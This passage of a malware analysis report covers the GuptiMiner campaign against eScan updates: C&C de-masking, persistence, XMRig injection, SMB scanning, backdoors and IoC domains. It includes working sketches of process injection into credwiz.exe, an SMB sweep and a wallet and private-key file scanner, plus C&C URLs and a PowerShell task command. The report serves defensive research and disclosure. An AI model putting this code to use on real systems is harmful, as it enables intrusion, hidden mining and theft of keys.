As an example, one such server we observed was www.elimpacific[.]net. At the time, it was returning two addresses: 179.38.204[.]38 (the masked address) and 23.195.101[.]1 (the payload version). 

The address 23.195.101[.]1 denotes a version, and if it is greater than the current version, the malware performs the update by downloading the PNG file with the shellcode. This update is downloaded by requesting a PNG file from the real C&C server, whose address is calculated by de-masking the 179.38.204[.]38 address. 

The request is then made, along with the calculated IP address 185.45.192[.]43 and a hardcoded constant elimp. Using a constant like this serves as an additional password, in a sense:
185.45.192[.]43/elimp/ 
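The de-masking itself is a simple per-octet XOR, which can be reproduced with the following sketch (the observed pair 179.38.204[.]38 → 185.45.192[.]43 checks out):

#include <stdio.h>
#include <stdint.h>

// De-mask the C&C address: XOR the four octets with 0xA, 0xB, 0xC, 0xD respectively.
void DemaskAddress(const uint8_t masked[4], uint8_t real[4])
{
    const uint8_t xorKey[4] = { 0x0A, 0x0B, 0x0C, 0x0D };
    for (int i = 0; i < 4; i++)
        real[i] = masked[i] ^ xorKey[i];
}

int main(void)
{
    uint8_t masked[4] = { 179, 38, 204, 38 };
    uint8_t real[4];
    DemaskAddress(masked, real);
    printf("%u.%u.%u.%u\n", real[0], real[1], real[2], real[3]);  // prints 185.45.192.43
    return 0;
}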

GuptiMiner is requesting the payload from a real IP address

When the PNG file is downloaded, the rest of the process is the same as usual. 

We’ve discovered two servers for this functionality so far: 

  • www.elimpacific[.]net (URL path constant: elimp) 
  • www.espcomp[.]net (URL path constant: OpenSans) 

Anti-VM and Anti-debug Tricks 

294b73d38b89ce66cfdefa04b1678edf1b74a9b7f50343d9036a5d549ade509a
(2023-11-09 14:19:45 UTC) 

Along with other updates described above, we also observed an evolution in using anti-VM and anti-debugging tricks. These are done by checking well known disk drivers, registry keys, and running processes. 

GuptiMiner checks for these disk drivers by enumerating
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Disk\Enum

  • vmware 
  • qemu 
  • vbox 
  • virtualhd 

Specifically, the malware also checks the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Cylance for the presence of Cylance AV. 

As other anti-VM measures, the malware also checks whether the system has more than 4GB available RAM and at least 4 CPU cores. 

Last but not least, the malware also checks the presence of these processes by their prefixes: 

  • wireshar: Wireshark 
  • windbg.: WinDbg 
  • tcpview: TCPView 
  • 360: 360 Total Security 
  • hips: Huorong Internet Security (hipsdaemon.exe) 
  • proce: Process Explorer 
  • procm: Process Monitor 
  • ollydbg: OllyDbg 

Storing Images in Registry

6305d66aac77098107e3aa6d85af1c2e3fc2bb1f639e4a9da619c8409104c414
(2023-02-22 14:03:04 UTC) 

Similarly to Storing Payloads in Registry, in later stages of GuptiMiner, the authors also started to save the downloaded PNG images (containing the shellcodes) into registry as well. Contrary to storing the payloads, the images are not additionally XORed since the shellcodes in them are already encrypted using RC2 (see DNS TXT Record Decryption section for details). 

We’ve discovered these registry key locations to be utilized for storing the encrypted images containing the shellcodes so far: 

  • SYSTEM\CurrentControlSet\Control\Arbiters\Class 
  • SYSTEM\CurrentControlSet\Control\CMF\Class 
  • SYSTEM\CurrentControlSet\Control\CMF\CORE 
  • SYSTEM\CurrentControlSet\Control\CMF\DEF 
  • SYSTEM\CurrentControlSet\Control\CMF\Els 
  • SYSTEM\CurrentControlSet\Control\CMF\ASN 
  • SYSTEM\CurrentControlSet\Control\MSDTC\BSR 

Stage 2 – Gzip Loader 

357009a70daacfc3379560286a134b89e1874ab930d84edb2d3ba418f7ad6a0b
(2019-04-02 07:30:21 UTC) 

This stage is the shortest. The Gzip loader, which is extracted and executed by the shellcode from the PNG file, is a simple PE that decompresses another shellcode using Gzip and executes it in a separate thread. 

This thread additionally loads Stage 3, which we call Puppeteer, that orchestrates the core functionality of the malware – the cryptocurrency mining as well as, when applicable, deploying backdoors on the infected systems. 

Throughout the GuptiMiner operations, the Gzip loader has not changed in later versions. 

Stage 3 – Puppeteer

364984e8d62eb42fd880755a296bd4a93cc071b9705c1f1b43e4c19dd84adc65
(2019-03-15 10:07:36 UTC) 

Let’s now look at the biggest Stage 3, the Puppeteer. It pulls its strings everywhere across the infected system, manipulating the GuptiMiner components to do its bidding, hence the name we’ve chosen. It orchestrates further actions and deploys two core components of the malware – an XMRig coinminer and two types of backdoors that target devices present in large corporate networks. Of course, Puppeteer also introduces additional tricks to the arsenal of the whole GuptiMiner operation. 

This stage also uses one of the many Global\SLDV mutexes which we described in the Mutex timeline. For example, this particular sample uses SLDV01 as its mutex.

Puppeteer Setup

Puppeteer performs several steps for a proper setup. Firstly, it adds a new power scheme in Windows so the PC does not go to sleep. If the CPU has only one core (anti-VM) or the mutex already exists, the malware ceases to function by going to infinite sleep. 

In the next phase, the malware kills all the processes with a name msiexec.exe, cmstp.exe, or credwiz.exe. After that, it creates a separate thread that injects XMRig into a credwiz.exe process freshly created by the malware. The malware also disables Windows Defender by setting its service start status to disabled. 

For the persistence, Puppeteer chose an interesting approach. Firstly, it creates a scheduled task with the following configuration: 

  • A legitimate rundll32.exe file is copied and renamed into C:\ProgramData\Microsoft\Crypto\Escan\dss.exe and this file is executed from the scheduled task 
  • The malicious DLL is placed to C:\ProgramData\Microsoft\Crypto\Escan\updll3.dll3 and this file is loaded by dss.exe (exported function ValidateFile
  • The task is executed with every boot (TASK_TRIGGER_BOOT) and TASK_RUNLEVEL_HIGHEST priority 
  • The task is named and located at C:\Windows\system32\tasks\Microsoft\windows\autochk\ESUpgrade 

With that, the malware copies the content of updll3.dll3 into memory and deletes the original file from disk. Puppeteer then waits for a system shutdown (similarly to Stage 0.9) by waiting for the SM_SHUTTINGDOWN metric to be set to a non-zero value, checking every 100 milliseconds. Only when a shutdown of the system is initiated does the malware reintroduce the updll3.dll3 file back onto disk. 

Putting the malicious DLL back just before the system restart is really sneaky but also has potentially negative consequences. If the victim’s device encounters a crash, power outage, or any other kind of unexpected shutdown, the file won’t be restored from memory and Puppeteer will stop working from that point on. Perhaps this is the reason why the authors removed this trick in later versions, trading sophistication for the malware’s stability.

A code ensuring the correct after-reboot execution

The repetitive loading of updll3.dll3, as seen in the code above, is in fact Puppeteer’s update process. The DLL will ultimately perform steps of requesting a new PNG shellcode from the C&C servers and if it is a new version, the chain will be updated. 

XMRig Deployment 

During the setup, Puppeteer created a separate thread for injecting an XMRig coinminer into credwiz.exe process. Before the injection takes place, however, a few preparation steps are performed. 

The XMRig configuration is present directly in the XMRig binary (standard JSON config) stored in the Puppeteer binary. This configuration can be, however, modified to different values on the fly. In the example below, we can see a dynamic allocation of mining threads depending on the robustness of the infected system’s hardware. 

Patching the XMRig configuration on the fly, dynamically assigning mining threads

The injection is standard: the malware creates a new suspended process of credwiz.exe and, if successful, the coinminer is injected and executed by a WriteProcessMemory and CreateRemoteThread combo. 
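A simplified sketch of that combo follows. For brevity the payload is treated as position-independent code; mapping a full XMRig PE image into the target involves more work than shown here.

#include <windows.h>

// Sketch: spawn credwiz.exe suspended, copy a payload into it, and run it remotely.
BOOL InjectIntoCredwiz(const BYTE *payload, SIZE_T payloadSize)
{
    STARTUPINFOA si = { sizeof(si) };
    PROCESS_INFORMATION pi = { 0 };

    if (!CreateProcessA("C:\\Windows\\System32\\credwiz.exe", NULL, NULL, NULL,
                        FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi))
        return FALSE;

    // Allocate executable memory in the target and copy the payload over.
    LPVOID remote = VirtualAllocEx(pi.hProcess, NULL, payloadSize,
                                   MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(pi.hProcess, remote, payload, payloadSize, NULL);

    // Run the payload in a new remote thread and let the process resume.
    HANDLE thread = CreateRemoteThread(pi.hProcess, NULL, 0,
                                       (LPTHREAD_START_ROUTINE)remote, NULL, 0, NULL);
    ResumeThread(pi.hThread);

    if (thread) CloseHandle(thread);
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    return thread != NULL;
}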

Puppeteer continuously monitors the system for running processes, by default every 5 seconds. If it encounters any of the monitoring tools below, the malware kills any existing mining by taking down the whole credwiz.exe process and applies a progressive sleep, postponing another re-injection attempt by an additional 5 hours. 

  • taskmgr.exe 
  • autoruns.exe 
  • wireshark.exe 
  • wireshark-gtk.exe 
  • tcpview.exe 

Furthermore, the malware needs to locate the current updll3.dll3 on the system so its latest version can be stored in memory, removed from disk, and dropped just before another system restart. Two approaches are used to achieve this: 

  • Reading eScan folder location from HKEY_LOCAL_MACHINE\SOFTWARE\AVC3 
  • If one of the checked processes is called download.exe, which is a legitimate eScan binary, it obtains the file location to discover the folder. The output can look like this: 
    • \Device\HarddiskVolume1\Program Files (x86)\eScan\download.exe 

The check for download.exe serves as an alternative way of locating the eScan installation folder, and the code seems heavily inspired by the MSDN example Obtaining a File Name From a File Handle. 

Finally, Puppeteer also continuously monitors the CPU usage on the system and tweaks the core allocation so that mining is less resource-heavy and stays under the radar. 

Backdoor Setup

4dfd082eee771b7801b2ddcea9680457f76d4888c64bb0b45d4ea616f0a47f21
(2019-06-29 03:38:24 UTC) 

The backdoor is set up by the previous stage, Puppeteer, which first discovers whether the machine is running a Windows Server edition. This is done by checking the DNS Server registry key (the DNS Server service typically runs only on Windows Server editions):
SOFTWARE\Microsoft\Windows NT\CurrentVersion\DNS Server 

After that, the malware runs a command to get the number of computers joined to the domain:
net group “domain computers” /domain

The data printed by the net group command typically uses 25 characters per domain-joined computer plus a newline (CR+LF) for every three computers, as illustrated by the example below: 

Example output of net group command

In this version of the backdoor setup, Puppeteer checks whether the number of returned bytes is more than 100. If so, Puppeteer assumes it runs in a network shared with at least five computers and downloads additional payloads from a hardcoded C&C (https://m.airequipment[.]net/gpse/), executing them using a PowerShell command. 
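
The two probes can be summarized with the following Python sketch; how exactly Puppeteer combines the server check with the domain-size check is simplified here, and the helper names are ours.

import subprocess
import winreg

def is_windows_server():
    # The DNS Server service key typically exists only on Windows Server editions
    try:
        winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
                       r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\DNS Server")
        return True
    except OSError:
        return False

def domain_listing_size():
    # ~25 characters per domain-joined computer plus CR+LF for every three computers
    out = subprocess.run(["net", "group", "domain computers", "/domain"],
                         capture_output=True).stdout
    return len(out)

# Puppeteer proceeds with the extra payload when the listing exceeds 100 bytes
should_deploy = domain_listing_size() > 100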

Note that the threshold for the number of returned bytes was different and significantly higher in later versions of GuptiMiner, as can be seen in a dedicated section discussing Modular Backdoor, resulting in compromising only those networks which had more than 7000 computers joined in the same domain! 

If the checks above pass, Puppeteer uses a PowerShell command for downloading and executing the payload and, interestingly, it is run both in the current process and injected into explorer.exe. 

Furthermore, regardless of whether the infected computer is present in a network of a certain size or not, it tries to download an additional payload from dl.sneakerhost[.]com/u as well. This payload is yet another PNG file with the appended shellcode. We know this because the code uses the exact same parsing from the specific offset 0x325 of the PNG file as described in Stage 1. However, during our analysis, this domain had already been taken down and we couldn’t verify what kind of payload was being distributed here. 

Puppeteer’s backdoor setup process was improved and tweaked multiple times during its long development. In the upcoming subsections, we will focus on the more important changes, mostly those which influence other parts of the malware or introduce a whole new functionality. 

Later Puppeteer Versions 

In later versions, the attackers switched to the datetime mutex paradigm (as illustrated in the Mutexes in Time section) and also introduced additional monitoring for more Sysinternals tools such as Process Explorer and Process Monitor, as well as other tools like OllyDbg, WinDbg, and TeamViewer. 

Pool Configuration

487624b44b43dacb45fd93d03e25c9f6d919eaa6f01e365bb71897a385919ddd
(2023-11-21 18:05:43 UTC) 

Additionally, the GuptiMiner authors also started to modify pool addresses in XMRig configurations with a new approach. They started using “r” and “m” subdomains depending on the available physical memory on the infected system. If there is at least 3 GB of RAM available, the malware uses:
m.domain.tld with auto mode and enabled huge pages.

If the available RAM is less than 3 GB, it uses:
r.domain.tld with light mode and disabled huge pages.
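
A sketch of this memory-based selection could look as follows, assuming the available physical memory is read via GlobalMemoryStatusEx; the returned dictionary only mimics the three settings mentioned above.

import ctypes

class MEMORYSTATUSEX(ctypes.Structure):
    _fields_ = [("dwLength", ctypes.c_uint32), ("dwMemoryLoad", ctypes.c_uint32),
                ("ullTotalPhys", ctypes.c_uint64), ("ullAvailPhys", ctypes.c_uint64),
                ("ullTotalPageFile", ctypes.c_uint64), ("ullAvailPageFile", ctypes.c_uint64),
                ("ullTotalVirtual", ctypes.c_uint64), ("ullAvailVirtual", ctypes.c_uint64),
                ("ullAvailExtendedVirtual", ctypes.c_uint64)]

def pick_pool(domain="domain.tld"):
    status = MEMORYSTATUSEX()
    status.dwLength = ctypes.sizeof(MEMORYSTATUSEX)
    ctypes.windll.kernel32.GlobalMemoryStatusEx(ctypes.byref(status))
    if status.ullAvailPhys >= 3 * 1024 ** 3:       # at least 3 GB of RAM available
        return {"pool": "m." + domain, "mode": "auto", "huge_pages": True}
    return {"pool": "r." + domain, "mode": "light", "huge_pages": False}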

In order to not keep things simple, the authors later also started to use “p” as a subdomain in some versions, without any specific reason for the naming convention (perhaps just to say it is a “pool”). 

The usage of all such domains over time can be seen in the Domains timeline. 

Variety in Used DLLs 

Puppeteer used many different DLL names and locations over the years, either for sideloading or for direct loading via scheduled tasks. For example: 

  • C:\Program Files (x86)\eScan\updll3.dll3 
  • C:\Program Files\Common Files\SYSTEM\SysResetErr\SysResetErr.DLL 
  • C:\Program Files\Microsoft SQL Server\SpellChecking\MsSpellChecking.DLL 
  • C:\Program Files\Microsoft SQL Server\SpellChecking\MsSpellCheckingHost.DLL 
  • C:\ProgramData\AMD\CNext\atiadlxx.dll 
  • C:\ProgramData\Microsoft\Assistance\LunarG\vulkan-1.dll 
  • C:\ProgramData\Microsoft\Crypto\Escan\updll3.dll 
  • C:\ProgramData\Microsoft\Crypto\Escan\updll3.dll3 
  • C:\ProgramData\Microsoft\Network\Escan\AutoWake.dll 

Puppeteer Cleanup 

1c31d06cbdf961867ec788288b74bee0db7f07a75ae06d45d30355c0bc7b09fe
(2020-03-09 00:57:11 UTC)

We’ve also seen “cleaner” Puppeteers, meaning they didn’t contain the setup process for backdoors, but they were able to delete the malicious DLLs from the system when a running monitoring tool was detected. 

Deploy Per-Quarter 

1fbc562b08637a111464ba182cd22b1286a185f7cfba143505b99b07313c97a4
(2021-03-01 10:43:27 UTC) 

In this particular version, the deployment of the backdoor was performed once every 3 months, indicating a per-quarter deployment.

The deployment happens in March, June, September, and December

Stage 4 – Backdoor 

Since no one who puts such effort into a malware campaign deploys just coinminers on the infected devices, let’s dig deeper into GuptiMiner’s additional functionality – two types of backdoors deployed on the infected devices.

PuTTY Backdoor 

07beca60c0a50520b8dbc0b8cc2d56614dd48fef0466f846a0a03afbfc42349d
(2021-03-01 10:31:33 UTC)

E:\Projects\putty-src\windows\VS2012\x64\Release\plink.pdb

One of the backdoors deployed by GuptiMiner is based on a custom build of PuTTY Link (plink). This build contains an enhancement for local SMB network scanning, and it ultimately enables lateral movement over the network to potentially exploit Windows 7 and Windows Server 2008 machines by tunneling SMB traffic through the victim’s infected device. 

Local SMB Scanning 

First, the plink binary is injected into the netsh.exe process by Puppeteer using the per-quarter deployment approach. After a successful injection, the malware discovers local IP ranges by reading the IP tables from the victim’s device, adding those into local and global IP range lists. 

With that, the malware continues with local SMB scanning over the obtained IP ranges: xx.yy.zz.1-254. When a device supporting SMB is discovered, it is saved in a dedicated list. The same goes for IPs that don’t support SMB, effectively deny-listing them from future actions. This deny list is saved in specific registry subkeys named Sem and Init, in this location:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\CMF\Class
where Init contains the found IP addresses and Sem contains their total count. 
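
Conceptually, the sweep boils down to probing TCP port 445 across each xx.yy.zz.1-254 range; the Python sketch below is our reconstruction and leaves out the registry bookkeeping of the Init and Sem subkeys.

import socket

def smb_sweep(prefix, timeout=0.3):
    responders, deny_list = [], []
    for host in range(1, 255):
        ip = "{}.{}".format(prefix, host)
        try:
            with socket.create_connection((ip, 445), timeout=timeout):
                responders.append(ip)    # device answers on SMB, potential target
        except OSError:
            deny_list.append(ip)         # deny-listed from future actions
    return responders, deny_list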

There are several conditions determining when such a scan is performed. For example, the scan can happen only on a day of the week (!), only in the per-quarter deployment window, and only between 12:00 and 18:00. We marked with (!) a unique coding artefact in the condition, since checking the day of the week is not necessary (it is always true). 

Questionable conditioning for SMB scanning

Finally, the malware also creates a new registry key HKEY_LOCAL_MACHINE\SYSTEM\RNG\FFFF three hours after a successful scan. This serves as a flag that the scanning should be finished, and no more scanning is needed. 

An even more interesting datetime-related bug can be seen in the condition for the RNG\FFFF registry key removal. The removal is done to indicate that the malware can perform another SMB scan after a certain period of time. 

As we can see in the figure below, the malware obtains the write time of the registry key and the current system time by SystemTimeToVariantTime API function and subtracts those. The subtraction result is a floating-point number where the integral part means number of days. 

Furthermore, the malware uses a constant 60*60*60*24=5184000 seconds (60 days) in the condition for the registry key removal. However, the condition is comparing VariantTime (days) with seconds. Thus, the backdoor can activate every 51.84 days instead of the (intended?) 60 days. A true blessing in disguise. 

Removal of RNG\FFFF key, deploying the backdoor after 51.84 days

Lateral Movement Over SMB Traffic 

After the local SMB scan is finished, the malware checks, from the received SMB packet results, whether any of the IP addresses that responded are running Windows 7 or Windows Server 2008. If any such system is found on the local network, the malware adds its IP address to a list of potential targets. 

Furthermore, GuptiMiner executes plink’s legacy main() function with artificial parameters. This creates a tunnel on port 445 between the attacker’s server gesucht[.]net and the victim’s device. 

Parameters used for plink main() function

This tunnel is used for sending SMB traffic through the victim’s device to the IP addresses from the target list, enabling lateral movement over the local network. 

Note that this version of Puppeteer, which deploys this backdoor, is from 2021. We also mentioned that only Windows 7 and Windows Server 2008 are targeted, which are rather old systems. We think this might be because the attackers try to exploit possible vulnerabilities on these old systems. 

To orchestrate the SMB communication, the backdoor hand-crafts SMB packets on the fly by modifying TID and UID fields to reflect previous SMB communication. As shown in the decompiled code below, the SMB packet 4, which is crafted and sent by the malware, contains both TID and UID from the responses of the local network device. 

The backdoor hand-crafts SMB packets on the fly

Here we provide an example of how the SMB packets look in Wireshark when sent by the malware. After the connection is established, the malware tries to log in as anonymous and makes requests for \IPC$ and a named pipe.

SMB traffic captured by Wireshark

Interested readers can find the captured PCAP on our GitHub.

Modular Backdoor 

f0ccfcb5d49d08e9e66b67bb3fedc476fdf5476a432306e78ddaaba4f8e3bbc4
(2023-10-10 15:08:36 UTC) 

Another backdoor that we’ve found during our research being distributed by Puppeteer is a modular backdoor which targets huge corporate networks. It consists of two phases: first, the malware scans the device for locally stored private keys and cryptocurrency wallets; the second part is an injected modular backdoor in the form of a shellcode. 

Checks on Private Keys, Wallets, and Corporate Network

This part of the backdoor focuses on scanning for private keys and wallet files on the system. This is done by searching for .pvk and .wallet files in these locations: 

  • C:\Users\* 
  • D:\* 
  • E:\* 
  • F:\* 
  • G:\* 

If such a file is found on the system, its path is logged in a newly created file C:\Users\Public\Ca.txt. Interestingly, this file is not processed on its own by the code we have available. We suppose the data will be stolen later when further modules are downloaded by the backdoor. 
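
A minimal re-creation of this sweep in Python might look like the following; the traversal details are assumptions, only the extensions, roots, and log file come from the sample.

import fnmatch
import os

ROOTS = [r"C:\Users", "D:\\", "E:\\", "F:\\", "G:\\"]
LOG_FILE = r"C:\Users\Public\Ca.txt"

def scan_for_keys_and_wallets():
    with open(LOG_FILE, "a") as log:
        for root in ROOTS:
            for dirpath, _dirs, files in os.walk(root, onerror=lambda err: None):
                for name in files:
                    if fnmatch.fnmatch(name, "*.pvk") or fnmatch.fnmatch(name, "*.wallet"):
                        log.write(os.path.join(dirpath, name) + "\n")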

The fact that the scan was performed is marked by creating a registry key:
HKEY_LOCAL_MACHINE\SYSTEM\Software\Microsoft\DECLAG 

If some private keys or wallets were found on the system, or the malware is running in a huge corporate environment, the malware proceeds with injecting the backdoor, in the form of a shellcode, into the mmc.exe process. 

The size of the corporate environment is estimated using the same approach as in Puppeteer’s backdoor setup, only at a different scale. Here, the malware compares the returned list of computers in the domain with 200,000 characters. To recapitulate, the data printed by the net group command uses 25 characters per domain-joined computer plus a newline (CR+LF) for every three computers. 

Example output of net group command

This effectively means that the network in which the malware operates must have at least 7781 computers joined in the domain, which is quite a large number.

Backdoor

8446d4fc1310b31238f9a610cd25ea832925a25e758b9a41eea66f998163bb34 

This shellcode is a completely different piece of code than anything we’ve seen so far across the GuptiMiner campaign. It is designed to be multi-modular, with the capability of adding more modules into the execution flow. Only a networking communication module, however, is hardcoded and available by default; its hash is 74d7f1af69fb706e87ff0116b8e4fa3a9b87275505e2ee7a32a8628a2d066549 (2022-12-19 07:31:39 UTC).

After the injection, the backdoor decrypts a hardcoded configuration and a hardcoded networking module using RC4. The RC4 key is also hardcoded and available directly in the shellcode. 

The configuration contains details about which server to contact, what ports to use, and the length of delays that should be set between commands/requests, among others. The domain for communication in this configuration is www.righttrak[.]net:443, with the IP address 185.248.160[.]141.

Decrypted network module configuration

The network module contains seven different commands that the attacker can use for instructing the backdoor about what to do. A complete list of commands accepted by the network module can be found in the table below. Note that each module that can be used by the backdoor contains such a command handler on its own. 

Command Description 
3.0 Connect 
3.1 Read socket 
3.2 Write socket 
3.3 Close socket 
Close everything 
Return 1 
12 Load configuration 

The modules are stored in an encrypted form in the registry, ensuring their persistence:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PCB

The backdoor also uses import-by-hash obfuscation for resolving API functions. The hashing function is a simple algorithm that, for each byte of the exported function name, adds 1 to the byte, multiplies the previously calculated number (calculated_hash, starting at 0) by 131, and adds the two together:
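
Rewritten in Python, the routine looks roughly like this (the 32-bit truncation is our assumption based on typical implementations of this scheme):

def api_hash(function_name):
    calculated_hash = 0
    for byte in function_name:
        # add 1 to the byte, multiply the running hash by 131, and sum the two
        calculated_hash = (calculated_hash * 131 + byte + 1) & 0xFFFFFFFF
    return calculated_hash

# e.g. api_hash(b"LoadLibraryA") is compared against a hardcoded value at runtime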

The server www.righttrak[.]net:443 had, at the time, a valid certificate. Note for example the not-at-all-suspicious email address the authors used. 

Certificate on www.righttrak[.]net:443 as shown by Censys

Other Infection Vectors of Modular Backdoor

af9f1331ac671d241bf62240aa52389059b4071a0635cb9cb58fa78ab942a33b

During our research, we have also found a 7zip SFX executable containing two files: 

  • ms00.dat 
  • notepad.exe 

notepad.exe is a small binary that decrypts the ms00.dat file using RC4 with the key V#@!1vw32. The decrypted ms00.dat file is the same Modular Backdoor malware as described above. 
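
The decryption step is easy to reproduce; the pure-Python RC4 below is our own helper for unpacking ms00.dat with the key found in notepad.exe.

def rc4(key, data):
    S = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:                         # keystream generation and XOR
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

# plaintext = rc4(b"V#@!1vw32", open("ms00.dat", "rb").read())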

However, we have not seen this SFX executable being distributed by GuptiMiner. This indicates that the backdoor might be distributed via other infection vectors as well. 

Related and Future Research

We’ve also observed other more or less related samples during our research. 

PowerShell Scripts

Interestingly, we’ve found the C&C domain from the backdoor setup phase (in Puppeteer) in additional scripts as well, which were not distributed by the traditional GuptiMiner operation as we know it. We think this might be a different kind of attack sharing the GuptiMiner infrastructure, though it may also be a separate campaign. The formatted PowerShell script can be found below: 

A PowerShell script targeting eScan (formatted)

In this case, the payload is downloaded and executed from the malicious domain only when an antivirus is installed and its name has more than 4 letters and starts with eS. One does not have to be a Scrabble champion to figure out that the malware authors are targeting the eScan AV once again. The malicious code is also run when the name of the installed AV has fewer than 5 letters. 

We’ve found this script being run via a scheduled task with the following command:
"cmd.exe" /c type "\<domain>\SYSVOL\<domain>\scripts\gpon.inc" | "\<domain>\SYSVOL\<domain>\scripts\powAMD64.dat" -nop - 
where powAMD64.dat is a copy of powershell.exe. The task name and location was C:\Windows\System32\Tasks\ScheduledDefrag. 

Usage of Stolen Certificates 

We have found two stolen certificates used for signing GuptiMiner payloads. Interestingly, one of these stolen certificates originates from Winnti operations. In this particular sample, the digital signature has the hash: 
529763AC53562BE3C1BB2C42BCAB51E3AD8F8A56 

This certificate is the same one mentioned by Kaspersky more than 10 years ago. However, we’ve also seen this certificate used in malware samples other than GuptiMiner, indicating a broader leak. 

A complete list of stolen certificates and their usage can be found in the table below: 

Stolen certificate SHA1 Signed GuptiMiner sample 
529763AC53562BE3C1BB2C42BCAB51E3AD8F8A56 31dfba1b102bbf4092b25e63aae0f27386c480c10191c96c04295cb284f20878 
529763AC53562BE3C1BB2C42BCAB51E3AD8F8A56 8e96d15864ec0cc6d3976d87e9e76e6eeccc23c551b22dcfacb60232773ec049 
31070C2EA30E6B4E1C270DF94BE1036AE7F8616B b0f94d84888dffacbc10bd7f9983b2d681b55d7e932c2d952d47ee606058df54 
31070C2EA30E6B4E1C270DF94BE1036AE7F8616B f656a418fca7c4275f2441840faaeb70947e4f39d3826d6d2e50a3e7b8120e4e 

Possible Ties to Kimsuky 

7f1221c613b9de2da62da613b8b7c9afde2ea026fe6b88198a65c9485ded7b3d
(2021-03-06 20:13:32 UTC) 

During our research, we’ve also found an information stealer which contains a PDB path rather similar to those used across the whole GuptiMiner campaign (MainWork):
F:\!PROTECT\Real\startW-2008\MainWork\Release\MainWork.pdb 

However, we haven’t seen it distributed by GuptiMiner and, according to our data, it doesn’t belong to the same operation and infection chain. This malware performs stealing activities like capturing every keystroke, harvesting HTML forms from opened browser tabs, noting the times programs were opened, etc., and stores the results in log files. 

What is truly interesting, however, is that this information stealer might come from Kimsuky operations. Also known as Black Banshee, among other aliases, Kimsuky is a North Korean state-backed APT group. 

It uses a similar approach of searching for the AhnLab real-time detection window class name 49B46336-BA4D-4905-9824-D282F05F6576 as mentioned by both AhnLab and Cisco Talos Intelligence in their Information-gathering module section. If such a window is found, it is terminated/hidden from the view of the infected user. 

Function that searches and terminates AhnLab’s real-time detection window class

Furthermore, the stealer contains an encrypted payload in its resources, with the hash d5bc6cf988c6d3c60e71195d8a5c2f7525f633bb54059688ad8cfa1d4b72aa6c (2021-02-19 15:00:47 UTC) and this PDB path:
F:\PROTECT\Real\startW-2008\HTTPPro\Release\HTTPPro.pdb 

This module is decrypted using the standard RC4 algorithm with the key messi.com. The module is used for downloading additional stages. The URLs used include:
http://stwu.mygamesonline[.]org/home/sel.php
http://stwu.mygamesonline[.]org/home/buy.php?filename=%s&key=%s 

The domain mygamesonline[.]org is commonly used by Kimsuky (with a variety of subdomains). 

The keylogger also downloads the next stage, called ms12.acm.

The next stage is downloaded with a name ms12.acm

With this, we see a possible pattern in the naming convention and a link to the Modular Backdoor. As described in the Other Infection Vectors section, the 7z SFX archive contains an encrypted file called ms00.dat, whose resemblance is hard to ignore.

Last but not least, another strong indicator for a possible attribution is the fact that the Kimsuky keylogger sample dddc57299857e6ecb2b80cbab2ae6f1978e89c4bfe664c7607129b0fc8db8b1f, which is mentioned in the same blogpost from Talos, contains a section called .vlizer, as seen below: 

Kimsuky keylogger sections

During the GuptiMiner installation process (Stage 0), we wrote about the threat actors introducing Code Virtualization in 2018. This was done by using a dedicated section called .v_lizer. 

Conclusion 

In this analysis, we described in detail our findings regarding a long-standing threat we call GuptiMiner. This sophisticated operation has been performing MitM attacks targeting an update mechanism of the eScan antivirus vendor. We disclosed the security vulnerability to both eScan and the India CERT and received confirmation on 2023-07-31 from eScan that the issue was fixed and successfully resolved. 

During the GuptiMiner operation, the attackers deployed a wide chain of stages and functionalities, including performing DNS requests to the attacker’s DNS servers, sideloading, extracting payloads from innocent-looking images, and signing their payloads with a custom trusted root anchor certification authority, among others. 

Two different types of backdoors were discovered, targeting large corporate networks. The first provides SMB scanning of the local network, enabling lateral movement over the network to potentially exploit vulnerable Windows 7 and Windows Server 2008 systems. The second backdoor is multi-modular, accepting commands in the background to install more modules, as well as focusing on stealing stored private keys and cryptowallets. 

Interestingly, the final payload distributed by GuptiMiner was also XMRig, which is a bit unexpected for such a well-thought-out operation. 

We have also found possible ties to Kimsuky, a notorious North Korean APT group, while observing similarities between Kimsuky keylogger and fragments discovered during the analysis of the GuptiMiner operation. 

eScan follow-up

We have shared our findings and our research with eScan prior to publishing this analysis. For the sake of completeness, we are including their statement on this topic:

“I would also like to highlight some key points:
1. Our records indicate that the last similar report was received towards the end of the year 2019.
2. Since 2020, we have implemented a stringent checking mechanism that utilizes EV Signing to ensure that non-signed binaries are rejected.
3. Multiple heuristic rules have been integrated into our solution to detect and block any instances of legitimate processes being used for mining, including the forking of unsigned binaries.
4. While our internal investigations did not uncover instances of the XRig miner, it is possible that this may be due to geo-location factors.
5. Our latest solution versions employ secure (https) downloads, ensuring encrypted communication when clients interact with our cloud-facing servers for update downloads.”

According to our telemetry, we continue to observe new infections and GuptiMiner builds within our userbase. This may be attributable to eScan clients on these devices not being updated properly.

Indicators of Compromise (IoCs)

In this section, we summarize the Indicators of Compromise mentioned in this analysis. As these are indicators, it does not automatically mean that the mentioned files and/or domains are malicious on their own. 

For a more detailed list of IoCs for the whole GuptiMiner campaign, please visit our GitHub.

Evolution and Timelines 

Domains 

Domain
_spf.microsoft[.]com
acmeautoleasing[.]net
b.guterman[.]net
breedbackfp[.]com
crl.microsoft[.]com
crl.peepzo[.]com
crl.sneakerhost[.]com
desmoinesreg[.]com
dl.sneakerhost[.]com
edgesync[.]net
espcomp[.]net
ext.microsoft[.]com
ext.peepzo[.]com
ext.sneakerhost[.]com
gesucht[.]net
globalsign.microsoft[.]com
icamper[.]net
m.airequipment[.]net
m.cbacontrols[.]com
m.gosoengine[.]com
m.guterman[.]net
m.indpendant[.]com
m.insomniaccinema[.]com
m.korkyt[.]net
m.satchmos[.]net
m.sifraco[.]com
ns.bretzger[.]net
ns.deannacraite[.]com
